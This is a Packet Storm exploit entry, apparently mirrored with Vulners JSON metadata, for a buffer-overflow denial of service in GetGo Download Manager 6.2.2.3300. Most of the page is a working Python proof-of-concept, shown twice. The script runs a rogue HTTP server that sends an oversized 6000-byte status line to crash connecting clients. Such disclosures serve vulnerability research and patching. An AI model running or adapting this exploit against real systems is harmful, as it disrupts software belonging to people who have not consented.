Search...

GetGo Download Manager 6.2.2.3300 Denial Of Service

2019-08-16T00:00:00

ID PACKETSTORM:154122
Type packetstorm
Reporter Malav Vyas
Modified 2019-08-16T00:00:00

Description

                                        
                                            `# Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service  
# Date: 2019-08-15  
# Author - Malav Vyas  
# Vulnerable Software: GetGo Download Manager 6.2.2.3300  
# Vendor Home Page: www.getgosoft.com  
# Software Link: http://www.getgosoft.com/getgodm/  
# Tested On: Windows 7 (64Bit), Windows 10 (64Bit)  
# Attack Type : Remote  
# Impact : DoS  
# Co-author - Velayuthm Selvaraj  
  
# 1. Description  
# A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and   
# earlier could allow Remote NAS HTTP servers to perfor DOS via a long response.  
  
# 2. Proof of Concept  
  
import socket  
from time import sleep  
host = "192.168.0.112"  
port = 80  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.bind((host, port))  
sock.listen(1)  
print "\n[+] Listening on %d ..." % port  
  
cl, addr = sock.accept()  
print "[+] Connected to %s" % addr[0]  
evilbuffer = "A" * 6000  
  
buffer = "HTTP/1.1 200 " + evilbuffer + "\r\n"  
  
print cl.recv(1000)  
cl.send(buffer)  
print "[+] Sending buffer: OK\n"  
  
sleep(30)  
cl.close()  
sock.close()  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:154122", "type": "packetstorm", "bulletinFamily": "exploit", "title": "GetGo Download Manager 6.2.2.3300 Denial Of Service", "description": "", "published": "2019-08-16T00:00:00", "modified": "2019-08-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/154122/GetGo-Download-Manager-6.2.2.3300-Denial-Of-Service.html", "reporter": "Malav Vyas", "references": [], "cvelist": [], "lastseen": "2019-08-18T05:25:38", "viewCount": 72, "enchantments": {"dependencies": {"references": [], "modified": "2019-08-18T05:25:38", "rev": 2}, "score": {"value": -0.2, "vector": "NONE", "modified": "2019-08-18T05:25:38", "rev": 2}, "vulnersScore": -0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/154122/getgodm6223300-dos.txt", "sourceData": "`# Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service \n# Date: 2019-08-15 \n# Author - Malav Vyas \n# Vulnerable Software: GetGo Download Manager 6.2.2.3300 \n# Vendor Home Page: www.getgosoft.com \n# Software Link: http://www.getgosoft.com/getgodm/ \n# Tested On: Windows 7 (64Bit), Windows 10 (64Bit) \n# Attack Type : Remote \n# Impact : DoS \n# Co-author - Velayuthm Selvaraj \n \n# 1. Description \n# A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and \n# earlier could allow Remote NAS HTTP servers to perfor DOS via a long response. \n \n# 2. Proof of Concept \n \nimport socket \nfrom time import sleep \nhost = \"192.168.0.112\" \nport = 80 \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsock.bind((host, port)) \nsock.listen(1) \nprint \"\\n[+] Listening on %d ...\" % port \n \ncl, addr = sock.accept() \nprint \"[+] Connected to %s\" % addr[0] \nevilbuffer = \"A\" * 6000 \n \nbuffer = \"HTTP/1.1 200 \" + evilbuffer + \"\\r\\n\" \n \nprint cl.recv(1000) \ncl.send(buffer) \nprint \"[+] Sending buffer: OK\\n\" \n \nsleep(30) \ncl.close() \nsock.close() \n`\n"}